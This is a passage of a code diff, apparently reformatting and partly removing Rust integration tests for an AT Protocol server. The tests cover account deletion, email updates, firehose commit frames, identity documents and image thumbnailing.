+
did
125
+
)
126
+
.fetch_one(&pool)
127
+
.await
128
+
.expect("Failed to query deletion token");
117
129
let token = row.token;
118
130
let delete_payload = json!({
119
131
"did": did,
···
197
209
.expect("Failed to request account deletion");
198
210
assert_eq!(request_delete_res.status(), StatusCode::OK);
199
211
let pool = get_pool().await;
200
-
let row = sqlx::query!("SELECT token FROM account_deletion_requests WHERE did = $1", did)
201
-
.fetch_one(&pool)
202
-
.await
203
-
.expect("Failed to query deletion token");
212
+
let row = sqlx::query!(
213
+
"SELECT token FROM account_deletion_requests WHERE did = $1",
214
+
did
215
+
)
216
+
.fetch_one(&pool)
217
+
.await
218
+
.expect("Failed to query deletion token");
204
219
let token = row.token;
205
220
sqlx::query!(
206
221
"UPDATE account_deletion_requests SET expires_at = NOW() - INTERVAL '1 hour' WHERE token = $1",
···
236
251
let handle1 = format!("delete-user1-{}.test", ts);
237
252
let email1 = format!("delete-user1-{}@test.com", ts);
238
253
let password1 = "user1-password";
239
-
let (did1, jwt1) = create_verified_account(&client, &base_url, &handle1, &email1, password1).await;
254
+
let (did1, jwt1) =
255
+
create_verified_account(&client, &base_url, &handle1, &email1, password1).await;
240
256
let handle2 = format!("delete-user2-{}.test", ts);
241
257
let email2 = format!("delete-user2-{}@test.com", ts);
242
258
let password2 = "user2-password";
···
252
268
.expect("Failed to request account deletion");
253
269
assert_eq!(request_delete_res.status(), StatusCode::OK);
254
270
let pool = get_pool().await;
255
-
let row = sqlx::query!("SELECT token FROM account_deletion_requests WHERE did = $1", did1)
256
-
.fetch_one(&pool)
257
-
.await
258
-
.expect("Failed to query deletion token");
271
+
let row = sqlx::query!(
272
+
"SELECT token FROM account_deletion_requests WHERE did = $1",
273
+
did1
274
+
)
275
+
.fetch_one(&pool)
276
+
.await
277
+
.expect("Failed to query deletion token");
259
278
let token = row.token;
260
279
let delete_payload = json!({
261
280
"did": did2,
···
284
303
let handle = format!("delete-apppw-{}.test", ts);
285
304
let email = format!("delete-apppw-{}@test.com", ts);
286
305
let main_password = "main-password-123";
287
-
let (did, jwt) = create_verified_account(&client, &base_url, &handle, &email, main_password).await;
306
+
let (did, jwt) =
307
+
create_verified_account(&client, &base_url, &handle, &email, main_password).await;
288
308
let app_password_res = client
289
309
.post(format!(
290
310
"{}/xrpc/com.atproto.server.createAppPassword",
···
309
329
.expect("Failed to request account deletion");
310
330
assert_eq!(request_delete_res.status(), StatusCode::OK);
311
331
let pool = get_pool().await;
312
-
let row = sqlx::query!("SELECT token FROM account_deletion_requests WHERE did = $1", did)
313
-
.fetch_one(&pool)
314
-
.await
315
-
.expect("Failed to query deletion token");
332
+
let row = sqlx::query!(
333
+
"SELECT token FROM account_deletion_requests WHERE did = $1",
334
+
did
335
+
)
336
+
.fetch_one(&pool)
337
+
.await
338
+
.expect("Failed to query deletion token");
316
339
let token = row.token;
317
340
let delete_payload = json!({
318
341
"did": did,
+66
-21
tests/email_update.rs
+66
-21
tests/email_update.rs
···
1
1
mod common;
2
2
use reqwest::StatusCode;
3
-
use serde_json::{json, Value};
3
+
use serde_json::{Value, json};
4
4
use sqlx::PgPool;
5
5
6
6
async fn get_pool() -> PgPool {
···
12
12
.expect("Failed to connect to test database")
13
13
}
14
14
15
-
async fn create_verified_account(client: &reqwest::Client, base_url: &str, handle: &str, email: &str) -> String {
15
+
async fn create_verified_account(
16
+
client: &reqwest::Client,
17
+
base_url: &str,
18
+
handle: &str,
19
+
email: &str,
20
+
) -> String {
16
21
let res = client
17
-
.post(format!("{}/xrpc/com.atproto.server.createAccount", base_url))
22
+
.post(format!(
23
+
"{}/xrpc/com.atproto.server.createAccount",
24
+
base_url
25
+
))
18
26
.json(&json!({
19
27
"handle": handle,
20
28
"email": email,
···
39
47
let access_jwt = create_verified_account(&client, &base_url, &handle, &email).await;
40
48
let new_email = format!("new_{}@example.com", handle);
41
49
let res = client
42
-
.post(format!("{}/xrpc/com.atproto.server.requestEmailUpdate", base_url))
50
+
.post(format!(
51
+
"{}/xrpc/com.atproto.server.requestEmailUpdate",
52
+
base_url
53
+
))
43
54
.bearer_auth(&access_jwt)
44
55
.json(&json!({"email": new_email}))
45
56
.send()
···
55
66
.fetch_one(&pool)
56
67
.await
57
68
.expect("User not found");
58
-
assert_eq!(user.email_pending_verification.as_deref(), Some(new_email.as_str()));
69
+
assert_eq!(
70
+
user.email_pending_verification.as_deref(),
71
+
Some(new_email.as_str())
72
+
);
59
73
assert!(user.email_confirmation_code.is_some());
60
74
let code = user.email_confirmation_code.unwrap();
61
75
let res = client
···
92
106
let email2 = format!("{}@example.com", handle2);
93
107
let access_jwt2 = create_verified_account(&client, &base_url, &handle2, &email2).await;
94
108
let res = client
95
-
.post(format!("{}/xrpc/com.atproto.server.requestEmailUpdate", base_url))
109
+
.post(format!(
110
+
"{}/xrpc/com.atproto.server.requestEmailUpdate",
111
+
base_url
112
+
))
96
113
.bearer_auth(&access_jwt2)
97
114
.json(&json!({"email": email1}))
98
115
.send()
···
112
129
let access_jwt = create_verified_account(&client, &base_url, &handle, &email).await;
113
130
let new_email = format!("new_{}@example.com", handle);
114
131
let res = client
115
-
.post(format!("{}/xrpc/com.atproto.server.requestEmailUpdate", base_url))
132
+
.post(format!(
133
+
"{}/xrpc/com.atproto.server.requestEmailUpdate",
134
+
base_url
135
+
))
116
136
.bearer_auth(&access_jwt)
117
137
.json(&json!({"email": new_email}))
118
138
.send()
···
144
164
let access_jwt = create_verified_account(&client, &base_url, &handle, &email).await;
145
165
let new_email = format!("new_{}@example.com", handle);
146
166
let res = client
147
-
.post(format!("{}/xrpc/com.atproto.server.requestEmailUpdate", base_url))
167
+
.post(format!(
168
+
"{}/xrpc/com.atproto.server.requestEmailUpdate",
169
+
base_url
170
+
))
148
171
.bearer_auth(&access_jwt)
149
172
.json(&json!({"email": new_email}))
150
173
.send()
151
174
.await
152
175
.expect("Failed to request email update");
153
176
assert_eq!(res.status(), StatusCode::OK);
154
-
let user = sqlx::query!("SELECT email_confirmation_code FROM users WHERE handle = $1", handle)
155
-
.fetch_one(&pool)
156
-
.await
157
-
.expect("User not found");
177
+
let user = sqlx::query!(
178
+
"SELECT email_confirmation_code FROM users WHERE handle = $1",
179
+
handle
180
+
)
181
+
.fetch_one(&pool)
182
+
.await
183
+
.expect("User not found");
158
184
let code = user.email_confirmation_code.unwrap();
159
185
let res = client
160
186
.post(format!("{}/xrpc/com.atproto.server.confirmEmail", base_url))
···
209
235
.send()
210
236
.await
211
237
.expect("Failed to update email");
212
-
assert_eq!(res.status(), StatusCode::OK, "Updating to same email should succeed as no-op");
238
+
assert_eq!(
239
+
res.status(),
240
+
StatusCode::OK,
241
+
"Updating to same email should succeed as no-op"
242
+
);
213
243
}
214
244
215
245
#[tokio::test]
···
221
251
let access_jwt = create_verified_account(&client, &base_url, &handle, &email).await;
222
252
let new_email = format!("pending_{}@example.com", handle);
223
253
let res = client
224
-
.post(format!("{}/xrpc/com.atproto.server.requestEmailUpdate", base_url))
254
+
.post(format!(
255
+
"{}/xrpc/com.atproto.server.requestEmailUpdate",
256
+
base_url
257
+
))
225
258
.bearer_auth(&access_jwt)
226
259
.json(&json!({"email": new_email}))
227
260
.send()
···
250
283
let access_jwt = create_verified_account(&client, &base_url, &handle, &email).await;
251
284
let new_email = format!("valid_{}@example.com", handle);
252
285
let res = client
253
-
.post(format!("{}/xrpc/com.atproto.server.requestEmailUpdate", base_url))
286
+
.post(format!(
287
+
"{}/xrpc/com.atproto.server.requestEmailUpdate",
288
+
base_url
289
+
))
254
290
.bearer_auth(&access_jwt)
255
291
.json(&json!({"email": new_email}))
256
292
.send()
···
276
312
.await
277
313
.expect("Failed to update email");
278
314
assert_eq!(res.status(), StatusCode::OK);
279
-
let user = sqlx::query!("SELECT email, email_pending_verification FROM users WHERE handle = $1", handle)
280
-
.fetch_one(&pool)
281
-
.await
282
-
.expect("User not found");
315
+
let user = sqlx::query!(
316
+
"SELECT email, email_pending_verification FROM users WHERE handle = $1",
317
+
handle
318
+
)
319
+
.fetch_one(&pool)
320
+
.await
321
+
.expect("User not found");
283
322
assert_eq!(user.email, Some(new_email));
284
323
assert!(user.email_pending_verification.is_none());
285
324
}
···
293
332
let access_jwt = create_verified_account(&client, &base_url, &handle, &email).await;
294
333
let new_email = format!("badtok_{}@example.com", handle);
295
334
let res = client
296
-
.post(format!("{}/xrpc/com.atproto.server.requestEmailUpdate", base_url))
335
+
.post(format!(
336
+
"{}/xrpc/com.atproto.server.requestEmailUpdate",
337
+
base_url
338
+
))
297
339
.bearer_auth(&access_jwt)
298
340
.json(&json!({"email": new_email}))
299
341
.send()
···
334
376
.expect("Failed to attempt email update");
335
377
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
336
378
let body: Value = res.json().await.expect("Invalid JSON");
337
-
assert!(body["message"].as_str().unwrap().contains("already in use") || body["error"] == "InvalidRequest");
379
+
assert!(
380
+
body["message"].as_str().unwrap().contains("already in use")
381
+
|| body["error"] == "InvalidRequest"
382
+
);
338
383
}
339
384
340
385
#[tokio::test]
+1
-4
tests/feed.rs
+1
-4
tests/feed.rs
···
90
90
let client = client();
91
91
let base = base_url().await;
92
92
let res = client
93
-
.post(format!(
94
-
"{}/xrpc/app.bsky.notification.registerPush",
95
-
base
96
-
))
93
+
.post(format!("{}/xrpc/app.bsky.notification.registerPush", base))
97
94
.json(&json!({
98
95
"serviceDid": "did:web:example.com",
99
96
"token": "test-token",
-192
tests/firehose.rs
-192
tests/firehose.rs
···
1
-
mod common;
2
-
use common::*;
3
-
use cid::Cid;
4
-
use futures::{stream::StreamExt, SinkExt};
5
-
use iroh_car::CarReader;
6
-
use reqwest::StatusCode;
7
-
use serde::Deserialize;
8
-
use serde_json::{json, Value};
9
-
use std::io::Cursor;
10
-
use tokio_tungstenite::{connect_async, tungstenite};
11
-
12
-
#[derive(Debug, Deserialize)]
13
-
struct FrameHeader {
14
-
op: i64,
15
-
t: String,
16
-
}
17
-
18
-
#[derive(Debug, Deserialize)]
19
-
struct CommitFrame {
20
-
seq: i64,
21
-
rebase: bool,
22
-
#[serde(rename = "tooBig")]
23
-
too_big: bool,
24
-
repo: String,
25
-
commit: Cid,
26
-
rev: String,
27
-
since: Option<String>,
28
-
#[serde(with = "serde_bytes")]
29
-
blocks: Vec<u8>,
30
-
ops: Vec<RepoOp>,
31
-
blobs: Vec<Cid>,
32
-
time: String,
33
-
}
34
-
35
-
#[derive(Debug, Deserialize)]
36
-
struct RepoOp {
37
-
action: String,
38
-
path: String,
39
-
cid: Option<Cid>,
40
-
}
41
-
42
-
fn find_cbor_map_end(bytes: &[u8]) -> Result<usize, String> {
43
-
let mut pos = 0;
44
-
fn read_uint(bytes: &[u8], pos: &mut usize, additional: u8) -> Result<u64, String> {
45
-
match additional {
46
-
0..=23 => Ok(additional as u64),
47
-
24 => {
48
-
if *pos >= bytes.len() { return Err("Unexpected end".into()); }
49
-
let val = bytes[*pos] as u64;
50
-
*pos += 1;
51
-
Ok(val)
52
-
}
53
-
25 => {
54
-
if *pos + 2 > bytes.len() { return Err("Unexpected end".into()); }
55
-
let val = u16::from_be_bytes([bytes[*pos], bytes[*pos + 1]]) as u64;
56
-
*pos += 2;
57
-
Ok(val)
58
-
}
59
-
26 => {
60
-
if *pos + 4 > bytes.len() { return Err("Unexpected end".into()); }
61
-
let val = u32::from_be_bytes([bytes[*pos], bytes[*pos + 1], bytes[*pos + 2], bytes[*pos + 3]]) as u64;
62
-
*pos += 4;
63
-
Ok(val)
64
-
}
65
-
27 => {
66
-
if *pos + 8 > bytes.len() { return Err("Unexpected end".into()); }
67
-
let val = u64::from_be_bytes([bytes[*pos], bytes[*pos + 1], bytes[*pos + 2], bytes[*pos + 3], bytes[*pos + 4], bytes[*pos + 5], bytes[*pos + 6], bytes[*pos + 7]]);
68
-
*pos += 8;
69
-
Ok(val)
70
-
}
71
-
_ => Err(format!("Invalid additional info: {}", additional)),
72
-
}
73
-
}
74
-
fn skip_value(bytes: &[u8], pos: &mut usize) -> Result<(), String> {
75
-
if *pos >= bytes.len() { return Err("Unexpected end".into()); }
76
-
let initial = bytes[*pos];
77
-
*pos += 1;
78
-
let major = initial >> 5;
79
-
let additional = initial & 0x1f;
80
-
match major {
81
-
0 | 1 => { read_uint(bytes, pos, additional)?; Ok(()) }
82
-
2 | 3 => {
83
-
let len = read_uint(bytes, pos, additional)? as usize;
84
-
*pos += len;
85
-
Ok(())
86
-
}
87
-
4 => {
88
-
let len = read_uint(bytes, pos, additional)?;
89
-
for _ in 0..len { skip_value(bytes, pos)?; }
90
-
Ok(())
91
-
}
92
-
5 => {
93
-
let len = read_uint(bytes, pos, additional)?;
94
-
for _ in 0..len {
95
-
skip_value(bytes, pos)?;
96
-
skip_value(bytes, pos)?;
97
-
}
98
-
Ok(())
99
-
}
100
-
6 => {
101
-
read_uint(bytes, pos, additional)?;
102
-
skip_value(bytes, pos)
103
-
}
104
-
7 => Ok(()),
105
-
_ => Err(format!("Unknown major type: {}", major)),
106
-
}
107
-
}
108
-
skip_value(bytes, &mut pos)?;
109
-
Ok(pos)
110
-
}
111
-
112
-
fn parse_frame(bytes: &[u8]) -> Result<(FrameHeader, CommitFrame), String> {
113
-
let header_len = find_cbor_map_end(bytes)?;
114
-
let header: FrameHeader = serde_ipld_dagcbor::from_slice(&bytes[..header_len])
115
-
.map_err(|e| format!("Failed to parse header: {:?}", e))?;
116
-
let remaining = &bytes[header_len..];
117
-
let frame: CommitFrame = serde_ipld_dagcbor::from_slice(remaining)
118
-
.map_err(|e| format!("Failed to parse commit frame: {:?}", e))?;
119
-
Ok((header, frame))
120
-
}
121
-
122
-
#[tokio::test]
123
-
async fn test_firehose_subscription() {
124
-
let client = client();
125
-
let (token, did) = create_account_and_login(&client).await;
126
-
let url = format!(
127
-
"ws://127.0.0.1:{}/xrpc/com.atproto.sync.subscribeRepos",
128
-
app_port()
129
-
);
130
-
let (mut ws_stream, _) = connect_async(&url).await.expect("Failed to connect");
131
-
let post_text = "Hello from the firehose test!";
132
-
let post_payload = json!({
133
-
"repo": did,
134
-
"collection": "app.bsky.feed.post",
135
-
"record": {
136
-
"$type": "app.bsky.feed.post",
137
-
"text": post_text,
138
-
"createdAt": chrono::Utc::now().to_rfc3339(),
139
-
}
140
-
});
141
-
let res = client
142
-
.post(format!(
143
-
"{}/xrpc/com.atproto.repo.createRecord",
144
-
base_url().await
145
-
))
146
-
.bearer_auth(token)
147
-
.json(&post_payload)
148
-
.send()
149
-
.await
150
-
.expect("Failed to create post");
151
-
assert_eq!(res.status(), StatusCode::OK);
152
-
let mut frame_opt: Option<(FrameHeader, CommitFrame)> = None;
153
-
let timeout = tokio::time::timeout(std::time::Duration::from_secs(5), async {
154
-
loop {
155
-
let msg = ws_stream.next().await.unwrap().unwrap();
156
-
let raw_bytes = match msg {
157
-
tungstenite::Message::Binary(bin) => bin,
158
-
_ => continue,
159
-
};
160
-
if let Ok((h, f)) = parse_frame(&raw_bytes) {
161
-
if f.repo == did {
162
-
frame_opt = Some((h, f));
163
-
break;
164
-
}
165
-
}
166
-
}
167
-
})
168
-
.await;
169
-
assert!(timeout.is_ok(), "Timed out waiting for event for our DID");
170
-
let (header, commit) = frame_opt.expect("No matching frame found");
171
-
assert_eq!(header.op, 1);
172
-
assert_eq!(header.t, "#commit");
173
-
assert_eq!(commit.ops.len(), 1);
174
-
assert!(!commit.blocks.is_empty());
175
-
let op = &commit.ops[0];
176
-
let record_cid = op.cid.clone().expect("Op should have CID");
177
-
let mut car_reader = CarReader::new(Cursor::new(&commit.blocks)).await.unwrap();
178
-
let mut record_block: Option<Vec<u8>> = None;
179
-
while let Ok(Some((cid, block))) = car_reader.next_block().await {
180
-
if cid == record_cid {
181
-
record_block = Some(block);
182
-
break;
183
-
}
184
-
}
185
-
let record_block = record_block.expect("Record block not found in CAR");
186
-
let record: Value = serde_ipld_dagcbor::from_slice(&record_block).unwrap();
187
-
assert_eq!(record["text"], post_text);
188
-
ws_stream
189
-
.send(tungstenite::Message::Close(None))
190
-
.await
191
-
.ok();
192
-
}
+112
-46
tests/firehose_validation.rs
+112
-46
tests/firehose_validation.rs
···
1
1
mod common;
2
2
3
-
use common::*;
4
3
use cid::Cid;
5
-
use futures::{stream::StreamExt, SinkExt};
4
+
use common::*;
5
+
use futures::{SinkExt, stream::StreamExt};
6
6
use iroh_car::CarReader;
7
7
use reqwest::StatusCode;
8
8
use serde::{Deserialize, Serialize};
9
-
use serde_json::{json, Value};
9
+
use serde_json::{Value, json};
10
10
use std::io::Cursor;
11
11
use tokio_tungstenite::{connect_async, tungstenite};
12
12
···
52
52
match additional {
53
53
0..=23 => Ok(additional as u64),
54
54
24 => {
55
-
if *pos >= bytes.len() { return Err("Unexpected end".into()); }
55
+
if *pos >= bytes.len() {
56
+
return Err("Unexpected end".into());
57
+
}
56
58
let val = bytes[*pos] as u64;
57
59
*pos += 1;
58
60
Ok(val)
59
61
}
60
62
25 => {
61
-
if *pos + 2 > bytes.len() { return Err("Unexpected end".into()); }
63
+
if *pos + 2 > bytes.len() {
64
+
return Err("Unexpected end".into());
65
+
}
62
66
let val = u16::from_be_bytes([bytes[*pos], bytes[*pos + 1]]) as u64;
63
67
*pos += 2;
64
68
Ok(val)
65
69
}
66
70
26 => {
67
-
if *pos + 4 > bytes.len() { return Err("Unexpected end".into()); }
68
-
let val = u32::from_be_bytes([bytes[*pos], bytes[*pos + 1], bytes[*pos + 2], bytes[*pos + 3]]) as u64;
71
+
if *pos + 4 > bytes.len() {
72
+
return Err("Unexpected end".into());
73
+
}
74
+
let val = u32::from_be_bytes([
75
+
bytes[*pos],
76
+
bytes[*pos + 1],
77
+
bytes[*pos + 2],
78
+
bytes[*pos + 3],
79
+
]) as u64;
69
80
*pos += 4;
70
81
Ok(val)
71
82
}
72
83
27 => {
73
-
if *pos + 8 > bytes.len() { return Err("Unexpected end".into()); }
74
-
let val = u64::from_be_bytes([bytes[*pos], bytes[*pos + 1], bytes[*pos + 2], bytes[*pos + 3], bytes[*pos + 4], bytes[*pos + 5], bytes[*pos + 6], bytes[*pos + 7]]);
84
+
if *pos + 8 > bytes.len() {
85
+
return Err("Unexpected end".into());
86
+
}
87
+
let val = u64::from_be_bytes([
88
+
bytes[*pos],
89
+
bytes[*pos + 1],
90
+
bytes[*pos + 2],
91
+
bytes[*pos + 3],
92
+
bytes[*pos + 4],
93
+
bytes[*pos + 5],
94
+
bytes[*pos + 6],
95
+
bytes[*pos + 7],
96
+
]);
75
97
*pos += 8;
76
98
Ok(val)
77
99
}
···
80
102
}
81
103
82
104
fn skip_value(bytes: &[u8], pos: &mut usize) -> Result<(), String> {
83
-
if *pos >= bytes.len() { return Err("Unexpected end".into()); }
105
+
if *pos >= bytes.len() {
106
+
return Err("Unexpected end".into());
107
+
}
84
108
let initial = bytes[*pos];
85
109
*pos += 1;
86
110
let major = initial >> 5;
87
111
let additional = initial & 0x1f;
88
112
89
113
match major {
90
-
0 | 1 => { read_uint(bytes, pos, additional)?; Ok(()) }
114
+
0 | 1 => {
115
+
read_uint(bytes, pos, additional)?;
116
+
Ok(())
117
+
}
91
118
2 | 3 => {
92
119
let len = read_uint(bytes, pos, additional)? as usize;
93
120
*pos += len;
···
95
122
}
96
123
4 => {
97
124
let len = read_uint(bytes, pos, additional)?;
98
-
for _ in 0..len { skip_value(bytes, pos)?; }
125
+
for _ in 0..len {
126
+
skip_value(bytes, pos)?;
127
+
}
99
128
Ok(())
100
129
}
101
130
5 => {
···
228
257
println!(" tooBig: {}", frame.too_big);
229
258
println!(" repo: {}", frame.repo);
230
259
println!(" commit: {}", frame.commit);
231
-
println!(" rev: {} (valid TID: {})", frame.rev, is_valid_tid(&frame.rev));
260
+
println!(
261
+
" rev: {} (valid TID: {})",
262
+
frame.rev,
263
+
is_valid_tid(&frame.rev)
264
+
);
232
265
println!(" since: {:?}", frame.since);
233
266
println!(" blocks length: {} bytes", frame.blocks.len());
234
267
println!(" ops count: {}", frame.ops.len());
235
268
println!(" blobs count: {}", frame.blobs.len());
236
-
println!(" time: {} (valid format: {})", frame.time, is_valid_time_format(&frame.time));
237
-
println!(" prevData: {:?} (IMPORTANT - should have value for updates)", frame.prev_data);
269
+
println!(
270
+
" time: {} (valid format: {})",
271
+
frame.time,
272
+
is_valid_time_format(&frame.time)
273
+
);
274
+
println!(
275
+
" prevData: {:?} (IMPORTANT - should have value for updates)",
276
+
frame.prev_data
277
+
);
238
278
239
279
assert_eq!(frame.repo, did, "Frame repo should match DID");
240
-
assert!(is_valid_tid(&frame.rev), "Rev should be valid TID format, got: {}", frame.rev);
280
+
assert!(
281
+
is_valid_tid(&frame.rev),
282
+
"Rev should be valid TID format, got: {}",
283
+
frame.rev
284
+
);
241
285
assert!(!frame.blocks.is_empty(), "Blocks should not be empty");
242
-
assert!(is_valid_time_format(&frame.time), "Time should be ISO 8601 with milliseconds and Z suffix");
286
+
assert!(
287
+
is_valid_time_format(&frame.time),
288
+
"Time should be ISO 8601 with milliseconds and Z suffix"
289
+
);
243
290
244
291
println!("\nOps validation:");
245
292
for (i, op) in frame.ops.iter().enumerate() {
···
247
294
println!(" action: {}", op.action);
248
295
println!(" path: {}", op.path);
249
296
println!(" cid: {:?}", op.cid);
250
-
println!(" prev: {:?} (should be Some for updates/deletes)", op.prev);
297
+
println!(
298
+
" prev: {:?} (should be Some for updates/deletes)",
299
+
op.prev
300
+
);
251
301
252
302
assert!(
253
303
["create", "update", "delete"].contains(&op.action.as_str()),
254
-
"Invalid action: {}", op.action
304
+
"Invalid action: {}",
305
+
op.action
255
306
);
256
-
assert!(op.path.contains('/'), "Path should contain collection/rkey: {}", op.path);
307
+
assert!(
308
+
op.path.contains('/'),
309
+
"Path should contain collection/rkey: {}",
310
+
op.path
311
+
);
257
312
258
313
if op.action == "create" {
259
314
assert!(op.cid.is_some(), "Create op should have cid");
···
270
325
"CAR should have at least one root"
271
326
);
272
327
assert_eq!(
273
-
car_header.roots()[0], frame.commit,
328
+
car_header.roots()[0],
329
+
frame.commit,
274
330
"First CAR root should be commit CID"
275
331
);
276
332
···
292
348
if let Some(ref cid) = op.cid {
293
349
assert!(
294
350
block_cids.contains(cid),
295
-
"CAR should contain op's record block: {}", cid
351
+
"CAR should contain op's record block: {}",
352
+
cid
296
353
);
297
354
}
298
355
}
299
356
300
357
println!("\n=== Validation Complete ===\n");
301
358
302
-
ws_stream
303
-
.send(tungstenite::Message::Close(None))
304
-
.await
305
-
.ok();
359
+
ws_stream.send(tungstenite::Message::Close(None)).await.ok();
306
360
}
307
361
308
362
#[tokio::test]
···
402
456
println!("Frame prevData: {:?}", frame.prev_data);
403
457
404
458
for op in &frame.ops {
405
-
println!("Op: action={}, path={}, cid={:?}, prev={:?}",
406
-
op.action, op.path, op.cid, op.prev);
459
+
println!(
460
+
"Op: action={}, path={}, cid={:?}, prev={:?}",
461
+
op.action, op.path, op.cid, op.prev
462
+
);
407
463
408
464
if op.action == "update" && op.path.contains("app.bsky.actor.profile") {
409
465
assert!(
···
417
473
418
474
println!("\n=== Validation Complete ===\n");
419
475
420
-
ws_stream
421
-
.send(tungstenite::Message::Close(None))
422
-
.await
423
-
.ok();
476
+
ws_stream.send(tungstenite::Message::Close(None)).await.ok();
424
477
}
425
478
426
479
#[tokio::test]
···
475
528
let first_frame = first_frame_opt.expect("No first frame found");
476
529
477
530
println!("\n=== First Commit ===");
478
-
println!(" prevData: {:?} (first commit may be None)", first_frame.prev_data);
479
-
println!(" since: {:?} (first commit should be None)", first_frame.since);
531
+
println!(
532
+
" prevData: {:?} (first commit may be None)",
533
+
first_frame.prev_data
534
+
);
535
+
println!(
536
+
" since: {:?} (first commit should be None)",
537
+
first_frame.since
538
+
);
480
539
481
540
let post_payload2 = json!({
482
541
"repo": did,
···
519
578
let second_frame = second_frame_opt.expect("No second frame found");
520
579
521
580
println!("\n=== Second Commit ===");
522
-
println!(" prevData: {:?} (should have value - MST root CID)", second_frame.prev_data);
523
-
println!(" since: {:?} (should have value - previous rev)", second_frame.since);
581
+
println!(
582
+
" prevData: {:?} (should have value - MST root CID)",
583
+
second_frame.prev_data
584
+
);
585
+
println!(
586
+
" since: {:?} (should have value - previous rev)",
587
+
second_frame.since
588
+
);
524
589
525
590
assert!(
526
591
second_frame.since.is_some(),
···
529
594
530
595
println!("\n=== Validation Complete ===\n");
531
596
532
-
ws_stream
533
-
.send(tungstenite::Message::Close(None))
534
-
.await
535
-
.ok();
597
+
ws_stream.send(tungstenite::Message::Close(None)).await.ok();
536
598
}
537
599
538
600
#[tokio::test]
···
590
652
println!("Total frame size: {} bytes", raw_bytes.len());
591
653
592
654
fn bytes_to_hex(bytes: &[u8]) -> String {
593
-
bytes.iter().map(|b| format!("{:02x}", b)).collect::<Vec<_>>().join("")
655
+
bytes
656
+
.iter()
657
+
.map(|b| format!("{:02x}", b))
658
+
.collect::<Vec<_>>()
659
+
.join("")
594
660
}
595
661
596
-
println!("First 64 bytes (hex): {}", bytes_to_hex(&raw_bytes[..64.min(raw_bytes.len())]));
662
+
println!(
663
+
"First 64 bytes (hex): {}",
664
+
bytes_to_hex(&raw_bytes[..64.min(raw_bytes.len())])
665
+
);
597
666
598
667
let header_end = find_cbor_map_end(&raw_bytes).expect("Failed to find header end");
599
668
···
604
673
605
674
println!("\n=== Analysis Complete ===\n");
606
675
607
-
ws_stream
608
-
.send(tungstenite::Message::Close(None))
609
-
.await
610
-
.ok();
676
+
ws_stream.send(tungstenite::Message::Close(None)).await.ok();
611
677
}
+4
-1
tests/identity.rs
+4
-1
tests/identity.rs
···
301
301
assert!(!also_known_as.is_empty());
302
302
assert!(also_known_as[0].as_str().unwrap().starts_with("at://"));
303
303
assert!(body["verificationMethods"]["atproto"].is_string());
304
-
assert_eq!(body["services"]["atprotoPds"]["type"], "AtprotoPersonalDataServer");
304
+
assert_eq!(
305
+
body["services"]["atprotoPds"]["type"],
306
+
"AtprotoPersonalDataServer"
307
+
);
305
308
assert!(body["services"]["atprotoPds"]["endpoint"].is_string());
306
309
}
307
310
+80
-22
tests/image_processing.rs
+80
-22
tests/image_processing.rs
···
1
-
use bspds::image::{ImageProcessor, ImageError, OutputFormat, THUMB_SIZE_FEED, THUMB_SIZE_FULL, DEFAULT_MAX_FILE_SIZE};
1
+
use bspds::image::{
2
+
DEFAULT_MAX_FILE_SIZE, ImageError, ImageProcessor, OutputFormat, THUMB_SIZE_FEED,
3
+
THUMB_SIZE_FULL,
4
+
};
2
5
use image::{DynamicImage, ImageFormat};
3
6
use std::io::Cursor;
4
7
5
8
fn create_test_png(width: u32, height: u32) -> Vec<u8> {
6
9
let img = DynamicImage::new_rgb8(width, height);
7
10
let mut buf = Vec::new();
8
-
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap();
11
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png)
12
+
.unwrap();
9
13
buf
10
14
}
11
15
12
16
fn create_test_jpeg(width: u32, height: u32) -> Vec<u8> {
13
17
let img = DynamicImage::new_rgb8(width, height);
14
18
let mut buf = Vec::new();
15
-
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg).unwrap();
19
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg)
20
+
.unwrap();
16
21
buf
17
22
}
18
23
19
24
fn create_test_gif(width: u32, height: u32) -> Vec<u8> {
20
25
let img = DynamicImage::new_rgb8(width, height);
21
26
let mut buf = Vec::new();
22
-
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif).unwrap();
27
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif)
28
+
.unwrap();
23
29
buf
24
30
}
25
31
26
32
fn create_test_webp(width: u32, height: u32) -> Vec<u8> {
27
33
let img = DynamicImage::new_rgb8(width, height);
28
34
let mut buf = Vec::new();
29
-
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP).unwrap();
35
+
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP)
36
+
.unwrap();
30
37
buf
31
38
}
32
39
···
71
78
let processor = ImageProcessor::new();
72
79
let data = create_test_png(800, 600);
73
80
let result = processor.process(&data, "image/png").unwrap();
74
-
let thumb = result.thumbnail_feed.expect("Should generate feed thumbnail for large image");
81
+
let thumb = result
82
+
.thumbnail_feed
83
+
.expect("Should generate feed thumbnail for large image");
75
84
assert!(thumb.width <= THUMB_SIZE_FEED);
76
85
assert!(thumb.height <= THUMB_SIZE_FEED);
77
86
}
···
81
90
let processor = ImageProcessor::new();
82
91
let data = create_test_png(2000, 1500);
83
92
let result = processor.process(&data, "image/png").unwrap();
84
-
let thumb = result.thumbnail_full.expect("Should generate full thumbnail for large image");
93
+
let thumb = result
94
+
.thumbnail_full
95
+
.expect("Should generate full thumbnail for large image");
85
96
assert!(thumb.width <= THUMB_SIZE_FULL);
86
97
assert!(thumb.height <= THUMB_SIZE_FULL);
87
98
}
···
91
102
let processor = ImageProcessor::new();
92
103
let data = create_test_png(100, 100);
93
104
let result = processor.process(&data, "image/png").unwrap();
94
-
assert!(result.thumbnail_feed.is_none(), "Small image should not get feed thumbnail");
95
-
assert!(result.thumbnail_full.is_none(), "Small image should not get full thumbnail");
105
+
assert!(
106
+
result.thumbnail_feed.is_none(),
107
+
"Small image should not get feed thumbnail"
108
+
);
109
+
assert!(
110
+
result.thumbnail_full.is_none(),
111
+
"Small image should not get full thumbnail"
112
+
);
96
113
}
97
114
98
115
#[test]
···
125
142
let data = create_test_png(2000, 2000);
126
143
let result = processor.process(&data, "image/png");
127
144
assert!(matches!(result, Err(ImageError::TooLarge { .. })));
128
-
if let Err(ImageError::TooLarge { width, height, max_dimension }) = result {
145
+
if let Err(ImageError::TooLarge {
146
+
width,
147
